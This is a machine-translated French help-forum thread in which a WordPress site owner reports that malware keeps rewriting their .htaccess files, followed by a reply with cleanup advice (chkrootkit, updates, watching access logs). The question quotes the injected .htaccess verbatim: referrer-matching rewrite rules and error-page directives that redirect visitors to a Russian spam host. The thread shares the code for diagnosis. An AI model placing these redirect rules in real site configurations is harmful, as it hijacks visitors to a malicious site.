Le script malveillant change les files .htaccess sur le server

Duplication possible:
Mon server a été piraté URGENCE

Il semble y avoir un script malveillant qui accède à mon server et édite les files .htaccess pour tous mes sites hébergés pour redirect vers les liens de spam.

Quelle est la meilleure façon d'empêcher que cela ne se produise?

J'ai changé les détails de mon access au server, à la fois pour le panneau de contrôle et l'access FTP, et j'ai essayé de mettre à jour les files .htaccess existants avec le code suivant, mais il semble toujours changer.

# BEGIN WordPress RewriteEngine On RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] # END WordPress # protect wp-config.php <files wp-config.php> Order deny,allow Deny from all </files> # Protect the htaccess file <files .htaccess> order allow,deny deny from all </files> # protect from sql injection Options +FollowSymLinks RewriteEngine On RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR] RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) RewriteRule ^(.*)$ index.php [F,L] 

Y a-t-il autre chose qui aiderait?

Désolé pour le manque d'informations, je suis assez nouveau sur les servers, etc. Donc, s'il y a des détails supplémentaires, merci!

Merci d'avance pour votre aide.

Dan

******* MODIFIER *******

Le mauvais access .htaccess comme demandé

 <IfModule mod_rewrite.c> RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogstack|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*) RewriteRule ^(.*)$ http://byidelement.ru/ruby/index.php [R=301,L] RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*) RewriteRule ^(.*)$ http://byidelement.ru/ruby/index.php [R=301,L] </IfModule> # STRONG HTACCESS PROTECTION</code> <Files ~ "^.*\.([Hh][Tt][Aa])"> order allow,deny deny from all satisfy all </Files> # protect from sql injection Options +FollowSymLinks RewriteEngine On RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR] RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) RewriteRule ^(.*)$ index.php [F,L] ErrorDocument 400 http://byidelement.ru/ruby/index.php ErrorDocument 401 http://byidelement.ru/ruby/index.php ErrorDocument 403 http://byidelement.ru/ruby/index.php ErrorDocument 404 http://byidelement.ru/ruby/index.php ErrorDocument 500 http://byidelement.ru/ruby/index.php 

One Solution collect form web for “Le script malveillant change les files .htaccess sur le server”

Exécutez chkrootkit là-bas un peu vite, au cas où.

Assurez-vous que tous les packages sont à jour avec des corrections de security:

  • Ubuntu / Debian: apt-get update; apt-get dist-upgrade apt-get update; apt-get dist-upgrade
  • CentOS / Fedora / RHEL: yum upgrade

Il est probable que ce soit un exploit connu dans la version de WordPress (ou un autre cadre hors norme) que vous exécutez et maintenant, il est découvert qu'il est à distance exploité encore et encore. Si tel est le cas, searchz la dernière version de tous les frameworks que vous utilisez et vérifiez les corrections de security.

En supposant qu'il a été exploité à distance, cela peut être confirmé en obtenant une tail cours d'exécution sur le (s) journal (es) d'access au server Web et surveille toute activité suspecte. tail -f /var/log/apache2/access-log serait la command sur une installation stock Ubuntu, mais tous les périphériques de la distro sont tail -f /var/log/apache2/access-log à différents endroits d'Apache. Lorsque vous voyez quelque chose de suspect, vous saurez quel VirtualHost a été compromis. Si vous vous sentez aventureux, parcourez également vos journaux d'access historiques. Cela peut être intimidant sur un server de trafic élevé, mais montrera le point d'attaque. Affinez votre search en recherchant le moment où vous savez que la première attaque a eu lieu.

  • Formation des élèves du secondaire sur la security - Quels «virus» inoffensifs puis-je installer qu'ils peuvent find?
  • Les astuces du serveur de linux et windows, tels que ubuntu, centos, apache, nginx, debian et des sujets de rĂ©seau.